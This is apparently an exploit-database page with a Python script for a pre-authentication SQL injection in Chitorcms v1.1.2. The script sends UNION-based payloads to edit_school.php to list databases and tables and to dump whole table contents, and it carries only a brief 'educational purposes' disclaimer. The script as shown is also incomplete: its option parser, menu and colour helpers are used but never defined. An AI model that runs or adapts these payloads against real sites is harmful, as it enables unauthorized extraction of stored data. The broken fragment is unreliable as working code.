Exploits / Vulnerability Discovered : 2023-04-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Chitorcms v1.1.2 preauth sql injection is for educational purposes only and if it is used you will do on your own risk!
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)
def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')
elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")